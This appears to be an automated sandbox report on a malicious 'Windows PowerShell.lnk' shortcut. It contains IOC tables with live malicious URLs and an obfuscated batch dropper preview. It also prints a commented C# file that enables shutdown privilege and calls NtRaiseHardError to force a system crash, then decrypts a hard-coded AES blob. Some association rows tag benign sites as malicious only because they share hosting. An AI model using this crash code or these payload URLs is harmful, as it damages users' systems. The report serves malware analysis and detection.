Analysis stop reason:
Sample name: Windows PowerShell.lnk
Detection: MAL
Classification: mal100.rans.bank.expl.evad.winLNK@131/13@3/3
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 2
  • Number of non-executed functions: 1
Cookbook Comments:
  • Found application associated with file extension: .lnk
  • Connection to analysis system has been lost, crash info: Unknown
  • Exclude process from analysis (whitelisted): dllhost.exe
  • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net
  • Not all processes were analyzed; the report is missing behavior information
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
08:51:28 | API Interceptor | 52x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.25.234.53 | http://is.gd/areapersonalenet | malicious | Unknown | is.gd/areapersonalenet
140.82.121.4 | RfORrHIRNe.doc | malicious | Unknown | github.com/ssbb36/stv/raw/main/5.mp3
185.199.111.133 | Bootstrapper V1.19.exe | malicious | Python Stealer, Empyrean, Discord Token Stealer |
185.199.111.133 | DHL Shipment Doc's.xls | malicious | Remcos |
185.199.111.133 | PO-00536.xls | malicious | Remcos |
185.199.111.133 | https://www.diamondsbyeden.com/ | malicious | Unknown |
185.199.111.133 | https://www.diamondsbyeden.com/ | malicious | Unknown |
185.199.111.133 | http://fpnc.vnvrff.com/ | malicious | Unknown |
185.199.111.133 | WW8kzvnphl.vbs | malicious | Unknown |
185.199.111.133 | 2THp7fwNQD.vbs | malicious | Unknown |
185.199.111.133 | R183nzNa89.exe | malicious | Unknown |
185.199.111.133 | Shipping Documents.xls | malicious | Remcos |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
is.gd | American-equity Updated Employee sheet .odt | malicious | HTMLPhisher | 104.25.233.53
is.gd | Tonincasa Updated Employee sheet .pdf | malicious | HTMLPhisher | 104.25.234.53
is.gd | https://www.google.ca/url?q=mySNsytxq5XhxSKOln15&rct=z3NXEeooVKbLBxALR3Qz&sa=t&esrc=TvdsTs6Qdare1rEk2vxo&source=&cd=MQp5nwcHjWG5GNYTYunP&uact=&url=amp/is.gd/DHNFRO%23dmljdGltQHZpY3RpbS5vcmc= | malicious | HTMLPhisher | 104.25.233.53
is.gd | http://is.gd/DHNFRO#dmljdGltQHZpY3RpbS5vcmc= | malicious | HTMLPhisher | 104.25.234.53
is.gd | http://is.gd/EmlK8C | malicious | Unknown | 104.25.234.53
is.gd | http://www.is.gd/g1mDsM/ | malicious | Unknown | 104.25.233.53
is.gd | http://is.gd/af4MWe?US=937448/ | malicious | Unknown | 104.25.234.53
is.gd | http://www.is.gd/RHEDa0/ | malicious | Unknown | 172.67.83.132
is.gd | csmH586n48.pdf | malicious | Unknown | 104.25.233.53
is.gd | http://is.gd/pttgoovk6 | malicious | Unknown | 104.25.233.53
github.com | Request For Quotation.js | malicious | STRRAT | 140.82.121.4
github.com | 8QBpLkbY6i.exe | malicious | WhiteSnake Stealer | 140.82.121.4
github.com | https://jhansalazar.weebly.com/ | malicious | Unknown | 140.82.121.6
github.com | http://ogp.me/ns# | malicious | Unknown | 185.199.108.154
github.com | URGENT PAYMENT REQUEST.js | malicious | STRRAT | 140.82.121.4
github.com | 3wtD2jXnxy.exe | malicious | RedLine, STRRAT | 140.82.121.4
github.com | URGENT PAYMENT REQUEST.js | malicious | STRRAT | 140.82.121.4
github.com | URGENT PAYMENT REQUEST.js | malicious | STRRAT | 140.82.121.4
github.com | Quotation#4873920.js | malicious | STRRAT | 140.82.121.3
github.com | Quotation#4873920.js | malicious | STRRAT | 140.82.121.4
objects.githubusercontent.com | 8QBpLkbY6i.exe | malicious | WhiteSnake Stealer | 185.199.110.133
objects.githubusercontent.com | file.exe | malicious | Quasar, WhiteSnake Stealer | 185.199.109.133
objects.githubusercontent.com | SecuriteInfo.com.Win32.MalwareX-gen.27131.14737.exe | malicious | Unknown | 185.199.108.133
objects.githubusercontent.com | SecuriteInfo.com.Win32.MalwareX-gen.27131.14737.exe | malicious | Unknown | 185.199.111.133
objects.githubusercontent.com | https://us-west-2.protection.sophos.com/?d=r2.dev&u=aHR0cHM6Ly9wdWItOWNhOGJiMGM2NzVmNDFhYWIzODc2ZDhlNWFkZDMxYjIucjIuZGV2L05vdGUuaHRtbCM=&i=NjRiMDExNzU2MjkwN2M0MmM2NTMzYjVi&t=OW04SERhWDAyWmp1WEFOcWFUU2t5Y0JVSGhFSThsNSt0SGl3T2tNZkR5TT0=&h=eb4c9b03d0924a8291fc2550717e1fd7&s=AVNPUEhUT0NFTkNSWVBUSVYbSwqVLPu4gowbNoTM-q0OFozYRd237giKYdXaQtMC6QG | malicious | HTMLPhisher, Tycoon2FA | 185.199.109.133
objects.githubusercontent.com | https://www.filemail.com/t/NU6GESpW | malicious | HTMLPhisher, Tycoon2FA | 185.199.109.133
objects.githubusercontent.com | https://astral.sh/uv/install.ps1 | malicious | Unknown | 185.199.108.133
objects.githubusercontent.com | xmr_linux_amd64 (3).elf | malicious | Xmrig | 185.199.110.133
objects.githubusercontent.com | https://github.com/valinet/ExplorerPatcher | malicious | Unknown | 185.199.110.133
objects.githubusercontent.com | xmr_linux_amd64 (2).elf | malicious | Xmrig | 185.199.111.133
Match | Associated Sample Name / URL | Detection | Threat Name | Context
FASTLYUS | IpEmBW3Qw5.rtf | malicious | Unknown | 185.199.109.133
FASTLYUS | Request For Quotation.js | malicious | STRRAT | 199.232.196.209
FASTLYUS | bomb.exe | malicious | Amadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, Vidar | 151.101.2.49
FASTLYUS | 8QBpLkbY6i.exe | malicious | WhiteSnake Stealer | 185.199.110.133
FASTLYUS | https://cedars-sinai-enterprise.dicomgrid.com/worklist/ | malicious | Unknown | 151.101.129.140
FASTLYUS | [MALICIOUS]_Secured_Doc-[yBv-26104].pdf | malicious | Unknown | 151.101.2.137
FASTLYUS | https://clicktracking.yellowbook.com/trackinguserwebapp/tracking.html?MB_ID=256862&SE_ID=9&AG_ID=2952701&AD_ID=6851395&kw=restaurants%20near%20me&kw_type=p&C_ID=874339&SE_AD_ID=73873744870314&se_clk_id=0651300f23401ca1b2e355991fb49377&hibu_site=0&redirect_url=https://www.keybag.nl/image/arull.php?7120797967704b5369323074645079557a504c456e4d53532f4b7a79394c4c556c4e7a73684d7a64644c7a732f564b386a524c366b494364454841413d3dmaggie@proctorlane.com | malicious | HTMLPhisher | 151.101.66.137
FASTLYUS | survey.pdf | malicious | PDFPhish | 199.232.192.193
FASTLYUS | https://href.li/?https://CYT.sprenumen.ru/wJPIeL/#I#Ws-amclean@lwsd.org | malicious | Tycoon2FA | 151.101.2.137
FASTLYUS | fa5a527b.eml | malicious | HTMLPhisher | 151.101.66.137
CLOUDFLARENETUS | c1#U09a6.exe | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | XWorm.exe | malicious | LummaC | 188.114.96.3
CLOUDFLARENETUS | bomb.exe | malicious | Amadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, Vidar | 104.21.86.200
CLOUDFLARENETUS | S4dd5N5VuJ.lnk | malicious | Unknown | 172.67.188.77
CLOUDFLARENETUS | Iv7LiW8Jwu.lnk | malicious | Unknown | 172.67.143.87
CLOUDFLARENETUS | Bukti-Transfer...exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
CLOUDFLARENETUS | https://wide-loads.powerappsportals.com/ | malicious | Unknown | 104.18.2.157
CLOUDFLARENETUS | https://cedars-sinai-enterprise.dicomgrid.com/worklist/ | malicious | Unknown | 104.18.17.5
CLOUDFLARENETUS | rfc[1].html | malicious | Unknown | 172.67.41.60
CLOUDFLARENETUS | file.exe | malicious | LummaC, Vidar | 172.67.208.181
GITHUBUS | Request For Quotation.js | malicious | STRRAT | 140.82.121.4
GITHUBUS | 8QBpLkbY6i.exe | malicious | WhiteSnake Stealer | 140.82.121.4
GITHUBUS | https://jhansalazar.weebly.com/ | malicious | Unknown | 140.82.121.6
GITHUBUS | http://ogp.me/ns# | malicious | Unknown | 140.82.114.17
GITHUBUS | URGENT PAYMENT REQUEST.js | malicious | STRRAT | 140.82.121.4
GITHUBUS | 3wtD2jXnxy.exe | malicious | RedLine, STRRAT | 140.82.121.4
GITHUBUS | URGENT PAYMENT REQUEST.js | malicious | STRRAT | 140.82.121.4
GITHUBUS | URGENT PAYMENT REQUEST.js | malicious | STRRAT | 140.82.121.4
GITHUBUS | Quotation#4873920.js | malicious | STRRAT | 140.82.121.4
GITHUBUS | Quotation#4873920.js | malicious | STRRAT | 140.82.121.4
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | sj9eYmr725.exe | malicious | Quasar | 140.82.121.4, 104.25.234.53, 185.199.111.133
 | iOD95iHt4G.exe | malicious | Unknown | 140.82.121.4, 104.25.234.53, 185.199.111.133
 | iOD95iHt4G.exe | malicious | Unknown | 140.82.121.4, 104.25.234.53, 185.199.111.133
 | file.exe | malicious | Credential Flusher | 140.82.121.4, 104.25.234.53, 185.199.111.133
 | 8QBpLkbY6i.exe | malicious | WhiteSnake Stealer | 140.82.121.4, 104.25.234.53, 185.199.111.133
 | hkN23TcCdh.exe | malicious | Unknown | 140.82.121.4, 104.25.234.53, 185.199.111.133
 | Iv7LiW8Jwu.lnk | malicious | Unknown | 140.82.121.4, 104.25.234.53, 185.199.111.133
 | hkN23TcCdh.exe | malicious | Unknown | 140.82.121.4, 104.25.234.53, 185.199.111.133
 | Tcbnyqc7Cr.exe | malicious | DCRat | 140.82.121.4, 104.25.234.53, 185.199.111.133
 | Bukti-Transfer...exe | malicious | Snake Keylogger, VIP Keylogger | 140.82.121.4, 104.25.234.53, 185.199.111.133
                      No context
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
                      Category:modified
                      Size (bytes):132304
                      Entropy (8bit):4.950317998648966
                      Encrypted:false
                      SSDEEP:1536:q27LdLC0AeKaT08u2DP1Znt1NGuOD4chchVLC2D:qA1DfVHOD4chchV+i
                      MD5:A07FCB39B340AD8DEA993A5F5C4D9064
                      SHA1:77D0F76618142BE56ABD231B1296277F3E797DC9
                      SHA-256:EEB86BDD38DC4FA93046F3CC0E443018518B81828D34E5D1E75F3BD9AAB0F8A7
                      SHA-512:3A4BFAC095B40D6EF901F328DD8A807A053190C6812CBA4C1A768D9A7256E8635CD187FF3054BFC951DF18D0E0CD8941E1FAE786650AE98A30447109F76EABE6
                      Malicious:true
                      Preview:..&cls..@echo off..set ucbw=set..:: ........... . ..........., ... . ........... . .........., ..... ........ . ............ ......... . ............ ........ . ..........., ....... ..... .. ..... ............. . ............%ucbw% qmy= ..:: ..... ...., ............ . ...... ........, ... ....... .... ....., .......... .. ...., ........ ... ........ . ......... . ..., ... ....... ...... .... . ..... . ...........%ucbw%%qmy%jxaa==..:: ...... .......... ....., ..... .......... ..... ...... ......... ... ....... . ........... ............, ........ .......... ..... .. .......
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Sat Oct 5 14:36:05 2024, 1st section name ".debug$S"
                      Category:dropped
                      Size (bytes):1332
                      Entropy (8bit):4.015904538733568
                      Encrypted:false
                      SSDEEP:24:HbFzW9DaGdaHFwKdNeI+ycuZhNuCakSZDPNnqS2d:73GKdw1uluCa3ZpqSG
                      MD5:52EE31550208F2E9D7798FF8792F0840
                      SHA1:C66B5839D884F2CCC2D2CEA21F063E34459F1016
                      SHA-256:A45569C1EF2AFA43264DB92446855F5A32961F47E53F75431165B36D2D8E7688
                      SHA-512:4CAA670C6A521F5A88E10F613B4690D7BA07DF58AFD73579D6FCD5042E1098A75E728EBAF6378C0AD22012EC098C9083C18C6A5C51E8497ABDDCFBFDFD8C10C9
                      Malicious:false
                      Preview:L....N.g.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........V....c:\Users\user\AppData\Local\Temp\pbkjdvqy\CSC3B4ECC64669B4C7AA39D189AE322B4F.TMP..................(......Rc...}7..........6.......C:\Users\user\AppData\Local\Temp\RES7AF.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.b.k.j.d.v.q.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:MSVC .res
                      Category:dropped
                      Size (bytes):652
                      Entropy (8bit):3.12548759652439
                      Encrypted:false
                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grywCak7YnqqZDPN5Dlq5J:+RI+ycuZhNuCakSZDPNnqX
                      MD5:0C281DE6A7F213BE8952639AE4C17D37
                      SHA1:61439165DD9550C8098A21F1265FE146980AE8CE
                      SHA-256:3B308B1258D6A6ACFEF5DBBBB8B7C1CF9F9DEE883D2167B6C0A8D5AB7E7CCE8D
                      SHA-512:42EA071B7EC88285453DC6A4B59411B66BB9B81B77EB23CAC8CBB7223C80546EDF7739FBFF2F60CD6E30661E528785D3E2164C77660058466C4FD4B99F0B8C35
                      Malicious:false
                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.b.k.j.d.v.q.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...p.b.k.j.d.v.q.y...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (972), with no line terminators
                      Category:dropped
                      Size (bytes):975
                      Entropy (8bit):5.470697572113314
                      Encrypted:false
                      SSDEEP:24:JVkzomWKDcpzweoEi0gp91x7fKlgHg0eKF2yjahKF2PO6Hd7KF2v6o5wkxQ1:JVyomWKDcpz3o/0gp9zrgmFB+cFX6Hsf
                      MD5:2C592480A51FF7A7D45E4233EF0D7AEE
                      SHA1:FDDF34BB2B397C54521255AE82093DA2938642D7
                      SHA-256:6A7DE1714F4980AFD5CD7BCF889AC569AB62424367BBD3933826CF79BFC22136
                      SHA-512:A91B6DDA179595A43D40E6DF9DB8C7FFE2D4A1ED75E0350675D52B7D450959D502D82CDB1A4C4BA59C4D07661B73E430867FE90212735B4A52E06A5436233D04
                      Malicious:false
Preview (the report's single-line dump reindented, logic unchanged, with comments added):

    using System;
    using System.Text;
    using System.Security.Cryptography;
    using System.Runtime.InteropServices;
    using System.IO;

    public class X
    {
        // Undocumented ntdll exports: enable a privilege on the caller, and raise a
        // "hard error" in the kernel.
        [DllImport("ntdll.dll")]
        public static extern uint RtlAdjustPrivilege(int p, bool e, bool c, out bool o);
        [DllImport("ntdll.dll")]
        public static extern uint NtRaiseHardError(uint e, uint n, uint u, IntPtr p, uint v, out uint r);

        public static unsafe string Shot()
        {
            bool o; uint r;
            // Privilege 19 is SeShutdownPrivilege; it has to be enabled for the next call to work.
            RtlAdjustPrivilege(19, true, false, out o);
            // Status 0xC0000022 (STATUS_ACCESS_DENIED) with response option 6 (OptionShutdownSystem)
            // forces an immediate system crash (blue screen): this is the "instant shutdown" the
            // report flags. If the call succeeds, nothing after this line ever executes.
            NtRaiseHardError(0xc0000022, 0, 0, IntPtr.Zero, 6, out r);
            // AES (Aes.Create() defaults to CBC with PKCS7 padding) over a 48-byte ciphertext with a
            // hard-coded 256-bit key and 16-byte IV; the decrypted string does not appear in this section.
            byte[] c = Convert.FromBase64String("RNo8TZ56Rv+EyZW73NocFOIiNFfL45tXw24UogGdHkswea/WhnNhCNwjQn1aWjfw");
            byte[] k = Convert.FromBase64String("/a1Y+fspq/NwlcPwpaT3irY2hcEytktuH7LsY+NlLew=");
            byte[] i = Convert.FromBase64String("9sXGmK4q9LdYFdOp4TSsQw==");
            using (Aes a = Aes.Create())
            {
                a.Key = k; a.IV = i;
                ICryptoTransform d = a.CreateDecryptor(a.Key, a.IV);
                using (var m = new MemoryStream(c))
                using (var y = new CryptoStream(m, d, CryptoStreamMode.Read))
                using (var s = new StreamReader(y))
                {
                    return s.ReadToEnd();
                }
            }
        }
    }
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                      Category:dropped
                      Size (bytes):181
                      Entropy (8bit):5.04566841683736
                      Encrypted:false
                      SSDEEP:3:0HXEXA8FREQN+E2J5xAIKTDVAlUiQCIFRVRMxTlLD8HIN+E2J5xAIKTDVAlHGA:pAu7N723fIDVaUzxs5n8oN723fIDVaHx
                      MD5:039F7E6B861EF3C82F54AB3790E72CE4
                      SHA1:5B8B7D564E5ED521A017D3317984275D4C620883
                      SHA-256:F0DCB2EF786DD34D06430B4C2915A59A1D35FF092656AE9074C58C13202FF03C
                      SHA-512:EF8AA13108B37347E21017A6408DAE247A41499FFB7C172CA34D75ED63CD8D73A57A2991E6DB5BD14C34ADC262A7D81A6DC9AB436EE466547CAD0733CE0B6525
                      Malicious:true
                      Preview:./t:library /utf8output /out:"C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.dll" /debug- /optimize+ /unsafe "C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.0.cs"
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):4608
                      Entropy (8bit):3.8194717084024554
                      Encrypted:false
                      SSDEEP:48:6wtela60xQKuPPLh4r8logsFJzFVocEHG4sSSzAEHlWge9qBHg/1uluCa3Zpq:lIlz02hf8NEH+Fe9kAQZK
                      MD5:21FE04DBE5B6A63DDE618CA5A7056655
                      SHA1:52AB8CB685DDA1835E3BDF6626E28CC31AB98A64
                      SHA-256:C5B81648F3FD35ACB2EA344E33674F0387B55286F232C062B31C9D73DF30D4D6
                      SHA-512:A7B450458D9C92478E948AD674D2CE4D8B2FF10C05BCF8F0327ED67006C188F3B7645358362727ED417B1AB1899C8B9D36E6CB3D80BE0E6B71092E8AB9E75672
                      Malicious:false
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....N.g...........!................n)... ...@....... ....................................@..................................)..S....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H.......h!...............................................................0................(....& ".....~.......(....&r...p(.....r...p(.....r...p(......(.........o........o........o......o....o.......s...........s........s........o.......0..,...o.......,...o.......,...o.......,...o.......*....4.................. .........z.8.........J.t.........(....*BSJB............v4.0.30319......l...0...#~..........#Strings....@.......#US.P.......#GUID...`...P...#Blob...........GU........%3
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                      Category:modified
                      Size (bytes):678
                      Entropy (8bit):5.26875980199203
                      Encrypted:false
                      SSDEEP:12:xKIR3haSV1KaSVlKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AIdhamsamlKax5DqBVKVrdFAMBJTH
                      MD5:BD8B4F3B5E89628C25345FCC95D7CADB
                      SHA1:ADDA61440EA67DF76CE1C9E56158E7C810DF3535
                      SHA-256:FD515101D2CF9D131C177B35290F1E76FFB7212AD7934F54037266C173359FE6
                      SHA-512:294DF7363014C7F950A43F6BC6082C52CF19D5FDA4A8DBA47A3295FB58751CD5F03E94C1C7ADB343277D088472775713E5B1CA10A2F387955A35F30F740A798C
                      Malicious:false
                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /out:"C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.dll" /debug- /optimize+ /unsafe "C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):4511
                      Entropy (8bit):3.76365268496157
                      Encrypted:false
                      SSDEEP:48:7oCzAEy0sHOBQlHJySogZoYgwUsHOBQlLySogZoYgk1:7oCkMsHOBQ/HWsHOBQ9Hb
                      MD5:9CCE5356DC6A11416493AE6EBB29E467
                      SHA1:C6A7D6172E507BA80941B86E6961DFEC8AC13BC6
                      SHA-256:E2A7C9821C385AE88145CC7C4CAA8009BAFCA84BB4EE5F31D30B6D2566BF7179
                      SHA-512:E968D375CD980FEED4C82B1D4472DDE54A0BAF2626BD9806D593BE5C03FF07D2975A7C34B10C027F1BD85F9998F5C95D6C75C2A622AF38004B92F490C6FAD4B1
                      Malicious:false
                      Preview:...................................FL..................F. .. ...>...W...~.yJ%...;}.I%...<............................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........S.....r.W...~.yJ%.....z.2.<...EYmf .WINDOW~1.LNK..^......EW.5EYmf............................%.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l...l.n.k......._...............-.......^............SAf.....C:\Users\user\Desktop\Windows PowerShell.lnk..`.......X.......134349...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z....s...W....."KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....EW.5..Windows.@......OwHEYmf....3......................Q..W.i.n.d.o.w.s.....Z.1.....EYjf..System32..B......OwHEYkf..........................~+4.S.y.s.t.e.m.3.2.....t.1......O.I..Wi
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):4511
                      Entropy (8bit):3.76365268496157
                      Encrypted:false
                      SSDEEP:48:7oCzAEy0sHOBQlHJySogZoYgwUsHOBQlLySogZoYgk1:7oCkMsHOBQ/HWsHOBQ9Hb
                      MD5:9CCE5356DC6A11416493AE6EBB29E467
                      SHA1:C6A7D6172E507BA80941B86E6961DFEC8AC13BC6
                      SHA-256:E2A7C9821C385AE88145CC7C4CAA8009BAFCA84BB4EE5F31D30B6D2566BF7179
                      SHA-512:E968D375CD980FEED4C82B1D4472DDE54A0BAF2626BD9806D593BE5C03FF07D2975A7C34B10C027F1BD85F9998F5C95D6C75C2A622AF38004B92F490C6FAD4B1
                      Malicious:false
                      Preview:...................................FL..................F. .. ...>...W...~.yJ%...;}.I%...<............................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........S.....r.W...~.yJ%.....z.2.<...EYmf .WINDOW~1.LNK..^......EW.5EYmf............................%.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l...l.n.k......._...............-.......^............SAf.....C:\Users\user\Desktop\Windows PowerShell.lnk..`.......X.......134349...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z....s...W....."KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....EW.5..Windows.@......OwHEYmf....3......................Q..W.i.n.d.o.w.s.....Z.1.....EYjf..System32..B......OwHEYkf..........................~+4.S.y.s.t.e.m.3.2.....t.1......O.I..Wi
                      File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Archive, ctime=Fri Feb 16 20:44:00 2024, mtime=Thu Oct 3 08:53:00 2024, atime=Fri Feb 16 20:44:00 2024, length=450560, window=hidenormalshowminimized
                      Entropy (8bit):4.576583116818045
                      TrID:
                      • Windows Shortcut (20020/1) 100.00%
                      File name:Windows PowerShell.lnk
                      File size:1'852 bytes
                      MD5:02e1f1ea7dc301147433623d31e5a294
                      SHA1:b882f489808747b6201b113d306a42d533ca229e
                      SHA256:de6d56ae01166232f2cb403c86d2ddf59d7654510100971fcd0fe59a3a8e9944
                      SHA512:3aa0615c43e1598e04af1208356c7b4f0d0310723f23837975141a46dc9191a9be0c2ddea95a56abbe335ce82a85f5f24a73982af8cb7051d622aaeb6b198554
                      SSDEEP:24:8REKnFr9yxoKjKW3k9AfWkp+/CWP+SXPqHLj7hI3pXQaR3+93HVibs9RY+/vmu:8y09yZLzybqHLj8Xv3qRYkV
                      TLSH:43311C110EE70758E6778B39ABFAF3324762FD65E81A9BAD008052884D11214EE75F7F
                      File Content Preview:L..................F.... ....v.@!a..g$^.z....v.@!a...............................P.O. .:i.....+00.../C:\...................V.1.....CY.@..Windows.@........T,*CY.K....K.....................Ap..W.i.n.d.o.w.s.....Z.1.....CY.L..System32..B........T,*CY.L......
                      Icon Hash:14ec98b2bae9ed0d

                      General

